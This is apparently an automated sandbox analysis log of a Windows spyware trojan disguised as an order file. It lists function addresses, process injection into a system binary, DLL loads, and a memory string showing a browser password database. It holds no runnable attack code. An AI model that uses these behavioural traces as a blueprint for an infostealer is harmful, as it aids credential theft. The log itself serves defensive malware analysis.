Source: C:\Users\user\Desktop\Zamowienie_522025.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_00406B15	5_2_00406B15
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_004072EC	5_2_004072EC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_00404C9E	5_2_00404C9E
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_6EDE1B63	5_2_6EDE1B63
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3243B2C0	9_2_3243B2C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324C12ED	9_2_324C12ED
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324252A0	9_2_324252A0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240D34C	9_2_3240D34C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D132D	9_2_324D132D
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3246739A	9_2_3246739A
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CF0CC	9_2_324CF0CC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324270C0	9_2_324270C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D70E9	9_2_324D70E9
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324DF0E0	9_2_324DF0E0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324EB16B	9_2_324EB16B
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3245516C	9_2_3245516C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3240F172	9_2_3240F172
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_3242B1B0	9_2_3242B1B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D16CC	9_2_324D16CC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324DF7B0	9_2_324DF7B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32411460	9_2_32411460
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324DF43F	9_2_324DF43F
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D7571	9_2_324D7571
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BD5B0	9_2_324BD5B0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324DFA49	9_2_324DFA49
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324D7A46	9_2_324D7A46
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32493A6C	9_2_32493A6C
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324CDAC6	9_2_324CDAC6
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32465AA0	9_2_32465AA0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324BDAAC	9_2_324BDAAC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A4E3F0	15_2_03A4E3F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03B003E6	15_2_03B003E6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFA352	15_2_03AFA352
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AC02C0	15_2_03AC02C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AE0274	15_2_03AE0274
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF41A2	15_2_03AF41A2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03B001AA	15_2_03B001AA
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF81CC	15_2_03AF81CC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A30100	15_2_03A30100
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03ADA118	15_2_03ADA118
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AC8158	15_2_03AC8158
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AD2000	15_2_03AD2000
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A3C7C0	15_2_03A3C7C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A40770	15_2_03A40770
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A64750	15_2_03A64750
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A5C6E0	15_2_03A5C6E0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03B00591	15_2_03B00591
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A40535	15_2_03A40535
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AEE4F6	15_2_03AEE4F6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AE4420	15_2_03AE4420
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF2446	15_2_03AF2446
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF6BD7	15_2_03AF6BD7
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFAB40	15_2_03AFAB40
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A3EA80	15_2_03A3EA80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A429A0	15_2_03A429A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03B0A9A6	15_2_03B0A9A6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A56962	15_2_03A56962
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A268B8	15_2_03A268B8
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A6E8F0	15_2_03A6E8F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A4A840	15_2_03A4A840
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A42840	15_2_03A42840
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03ABEFA0	15_2_03ABEFA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A4CFE0	15_2_03A4CFE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A32FC8	15_2_03A32FC8
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A82F28	15_2_03A82F28
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A60F30	15_2_03A60F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AE2F30	15_2_03AE2F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AB4F40	15_2_03AB4F40
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A52E90	15_2_03A52E90
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFCE93	15_2_03AFCE93
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFEEDB	15_2_03AFEEDB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFEE26	15_2_03AFEE26
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A40E59	15_2_03A40E59
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A58DBF	15_2_03A58DBF
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A3ADE0	15_2_03A3ADE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A4AD00	15_2_03A4AD00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03ADCD1F	15_2_03ADCD1F
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AE0CB5	15_2_03AE0CB5
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A30CF2	15_2_03A30CF2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A40C00	15_2_03A40C00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A8739A	15_2_03A8739A
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF132D	15_2_03AF132D
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A2D34C	15_2_03A2D34C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A452A0	15_2_03A452A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AE12ED	15_2_03AE12ED
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A5B2C0	15_2_03A5B2C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A4B1B0	15_2_03A4B1B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A7516C	15_2_03A7516C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A2F172	15_2_03A2F172
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03B0B16B	15_2_03B0B16B
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF70E9	15_2_03AF70E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFF0E0	15_2_03AFF0E0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AEF0CC	15_2_03AEF0CC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A470C0	15_2_03A470C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFF7B0	15_2_03AFF7B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF16CC	15_2_03AF16CC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03ADD5B0	15_2_03ADD5B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF7571	15_2_03AF7571
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFF43F	15_2_03AFF43F
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A31460	15_2_03A31460
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A5FB80	15_2_03A5FB80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AB5BF0	15_2_03AB5BF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A7DBF9	15_2_03A7DBF9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFFB76	15_2_03AFFB76
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03ADDAAC	15_2_03ADDAAC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A85AA0	15_2_03A85AA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AE1AA3	15_2_03AE1AA3
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AEDAC6	15_2_03AEDAC6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AB3A6C	15_2_03AB3A6C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFFA49	15_2_03AFFA49
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF7A46	15_2_03AF7A46
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AD5910	15_2_03AD5910
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A49950	15_2_03A49950
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A5B950	15_2_03A5B950
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A438E0	15_2_03A438E0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AAD800	15_2_03AAD800
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFFFB1	15_2_03AFFFB1
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A41F92	15_2_03A41F92
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A03FD2	15_2_03A03FD2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A03FD5	15_2_03A03FD5
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFFF09	15_2_03AFFF09
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A49EB0	15_2_03A49EB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A5FDC0	15_2_03A5FDC0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF7D73	15_2_03AF7D73
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A43D40	15_2_03A43D40
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AF1D5A	15_2_03AF1D5A
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AFFCF2	15_2_03AFFCF2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03AB9C32	15_2_03AB9C32
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FC1C50	15_2_02FC1C50
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FBCAE0	15_2_02FBCAE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FBAE30	15_2_02FBAE30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FBAE24	15_2_02FBAE24
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FBACE0	15_2_02FBACE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FBCD00	15_2_02FBCD00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FC5310	15_2_02FC5310
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FC3510	15_2_02FC3510
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FDB960	15_2_02FDB960
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_037FE3D3	15_2_037FE3D3
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_037FE28C	15_2_037FE28C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_037FE6CE	15_2_037FE6CE
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_037FD838	15_2_037FD838

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: String function: 3240B970 appears 105 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 03A2B970 appears 277 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 03A87E54 appears 102 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 03ABF290 appears 105 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 03A75130 appears 58 times

Source: Zamowienie_522025.exe, 00000009.00000003.2026597151.00000000322AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamermactivate_ssp.exej% vs Zamowienie_522025.exe
Source: Zamowienie_522025.exe, 00000009.00000003.2026597151.00000000321C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamermactivate_ssp.exej% vs Zamowienie_522025.exe
Source: Zamowienie_522025.exe, 00000009.00000003.1969302724.000000003235F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Zamowienie_522025.exe
Source: Zamowienie_522025.exe, 00000009.00000002.2087643297.000000003250D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Zamowienie_522025.exe
Source: Zamowienie_522025.exe, 00000009.00000003.1966643050.00000000321AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Zamowienie_522025.exe

Source: Zamowienie_522025.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/17@3/2

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

5_2_0040338F

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Code function: 5_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

5_2_00404722

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Code function: 5_2_00402104 CoCreateInstance,

5_2_00402104

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsl128D.tmp

Jump to behavior

Source: Zamowienie_522025.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.00000000032D8000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2515934645.000000000330C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Zamowienie_522025.exe	Virustotal: Detection: 36%
Source: Zamowienie_522025.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

File read: C:\Users\user\Desktop\Zamowienie_522025.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Zamowienie_522025.exe "C:\Users\user\Desktop\Zamowienie_522025.exe"
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Process created: C:\Users\user\Desktop\Zamowienie_522025.exe "C:\Users\user\Desktop\Zamowienie_522025.exe"
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Process created: C:\Users\user\Desktop\Zamowienie_522025.exe "C:\Users\user\Desktop\Zamowienie_522025.exe"	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe	Section loaded: dnsapi.dll	Jump to behavior
